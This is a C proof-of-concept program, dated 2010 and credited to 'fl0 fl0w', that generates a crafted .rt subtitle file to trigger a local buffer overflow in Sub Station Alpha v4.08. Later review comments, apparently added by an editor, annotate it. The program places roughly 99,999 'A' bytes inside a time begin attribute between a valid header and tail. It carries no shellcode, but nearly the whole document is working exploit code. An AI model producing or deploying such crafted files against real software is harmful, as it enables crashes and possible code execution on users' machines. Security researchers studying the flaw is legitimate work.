
# Title : Sub Station Alpha v4.08 .rt file Local Buffer Overflow PoC
# Published : 2010-01-15
# Author : fl0 fl0w


/*Sub Station Alpha v4.08 .rt file local buffer overflow poc
     by fl0 fl0w*/
#include <stdio.h>
#include <stdlib.h>   /* exit(), free(), EXIT_FAILURE: called below but never included */
#include <string.h>

#define FIL3 "testfile.rt"
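   /* Fixed .rt prefix written before the filler: a <window> element, one
    * subtitle line, and the opening of a <time begin=" attribute whose value
    * then receives the long run of filler bytes. The hex escapes lost their
    * backslashes in transcription ("x3C" instead of "\x3C"); the same 109
    * bytes are spelled out as plain text here. */
   char header[]=
   {
             "<window height=\"250\" width=\"300\" duration=\"15\" bgcolor=\"yellow\">\r\n"
             "Mary had a little lamb,\r\n"
             "<br/><time begin=\""     //header 109 bytes
   };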
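   /* Fixed .rt suffix written after the filler: closes the opened attribute,
    * adds three more timed lines and closes the <window> element so the file
    * still parses up to the oversized value. The hex escapes lost their
    * backslashes in transcription; the same 154 bytes are given as text. */
   char tail[]=
   {   
            //junk
            "\"/>\r\n<br/><time begin=\"6\"/>little lamb,\r\n"
            "<br/><time begin=\"9\"/>Mary had a little lamb\r\n"
            "<br/><time begin=\"12\"/>whose fleece was white as snow.\r\n"
            "</window>\r\n"    //tail 154 bytes
   };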
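   /* Console banner printed by main. The line breaks lost their backslashes
    * in transcription ("*n" instead of "*\n"); restored so each line ends
    * with a newline. */
   char banner[]=
   {
            "***********************************************************\n"
            "Sub Station Alpha v4.08 .rt file local buffer overflow poc*\n"
            "     by fl0 fl0w                                          *\n"
            "***********************************************************\n"
   };      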
/*--------prototypes------*/  
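   int cpy(char*,char*,int);            /* copy a C string (with NUL) to dest+offset; returns its length */
   int cpystr(char*,int,int,int);       /* fill len+1 bytes at dest+offset with one byte value */
   void print(char*);                   /* progress line "[*]msg" on stdout */
   unsigned int getFsize(FILE*,char*);  /* size in bytes of the file named by the second argument */
   int buildf(char*);                   /* was missing: main() called it before its definition, an implicit declaration */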
/*-----extern var--------*/
   /* Shared scratch storage. Both arrays have static storage (zero-filled at
    * program start) and are not heap objects, so they must never be passed
    * to free(). */
   enum { POC_BUF_LEN = 1000000 };
   char b[POC_BUF_LEN];      /* never written in this file */
   char *size;               /* declared but unused */
   char junk[POC_BUF_LEN];   /* filler; main() sets the first 99999 bytes to 'A', the rest stay 0 so "%s" stops there */
/*--------main---------------*/
    int main()
    {
        /* Entry point: show the banner, fill the filler buffer with 'A'
         * bytes, write the crafted .rt file named by FIL3 and wait for a
         * key so the console stays open. Always returns 0. */
        enum { FILLER_LEN = 99999 };   /* bytes of 0x41 placed between header and tail */
        fputs(banner, stdout);
        print("Starting sploit");
        memset(junk, 0x41, FILLER_LEN);
        buildf(FIL3);
        print("File done!");
        getchar();   /* pause until a key is pressed */
        return 0;
    }
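  /* Write header + filler + tail to the file named fname and report its size.
   * junk must already be filled by the caller (main does the memset).
   * On any I/O failure the process exits with a failure status, matching the
   * rest of the PoC; returns 0 on success. */
  int buildf(char* fname)
  {
      FILE* fp=fopen(fname,"wb");
        
      if(fp==NULL)
      {
         print("File writing error"); 
         exit(EXIT_FAILURE);   /* was exit(0): an error path must not report success */
      }   
      /* Close (which flushes) before measuring: the original measured through a
       * second handle while this one was still open and buffered, so the size
       * printed could be short. fclose's return is the last chance to see a
       * write error. */
      if(fprintf(fp,"%s%s%s",header,junk,tail)<0 || fclose(fp)!=0)
      {
         print("File writing error"); 
         exit(EXIT_FAILURE);
      }
      /* getFsize reopens the file by name and does not read from the FILE*
       * argument; measure the file that was actually written (fname, not FIL3). */
      printf("[!]File is %u bytes",getFsize(NULL,fname));
      /* The original called free(b) here; b is a static array, not a heap
       * block, so that was undefined behaviour and has been removed. */
              
      return 0;  
  }   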
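   /* Return the size in bytes of the file named gname, found by opening it and
    * seeking to the end. g is accepted only for interface compatibility: the
    * original overwrote it with a fresh handle, so no caller relied on it.
    * Exits the process with a failure status if the file cannot be opened or
    * measured. NOTE(review): ftell() after fseek(SEEK_END) on a binary stream
    * is the common way to size a file but is not guaranteed by the C standard. */
   unsigned int getFsize(FILE* g,char* gname)
   {
            (void)g;
            FILE* f=fopen(gname,"rb");
              
            if(f==NULL)
            {
            print("File error at reading");
            exit(EXIT_FAILURE);   /* was exit(0) */
            }            
            long pos=-1;
            if(fseek(f,0,SEEK_END)==0)
            {
               pos=ftell(f);   /* -1 on error */
            }
            fclose(f);   /* the original never closed this handle */
            if(pos<0)
            {
            print("File error at reading");
            exit(EXIT_FAILURE);
            }
             
            return (unsigned int)pos;
   }   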
   /* Copy the C string source, including its terminating NUL, to dest+offset.
    * No bounds check: the caller must guarantee dest has room for
    * offset + strlen(source) + 1 bytes and that the regions do not overlap.
    * Returns the length of source (terminator not counted). Unused in this file. */
   int cpy(char* source,char* dest,int offset)
   {
     size_t bytes = strlen(source) + 1;   /* payload plus terminator */
     char *at = dest + offset;
     memcpy(at, source, bytes);
     
     return (int)(bytes - 1);
   } 
   /* Fill len+1 bytes starting at dest+offset with the byte value str.
    * Note the count: this writes len+1 copies of str and does not append a
    * NUL terminator, so the result is a string only if dest already holds a
    * zero after the filled region. No bounds check; caller must ensure room.
    * Returns len. Unused in this file. */
   int cpystr(char* dest,int str,int len,int offset)
  {
      char *at = dest + offset;
      for (int i = 0; i <= len; i++)
      {
          at[i] = (char)str;
      }
      return len; 
  }     
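   /* Print a progress line as "[*]msg" on its own line. The format string lost
    * its backslashes in transcription ("n[*]%sn") and is restored here; msg is
    * always passed through %s, never used as the format itself. */
   void print(char* msg)
   {
     printf("\n[*]%s\n",msg);
   }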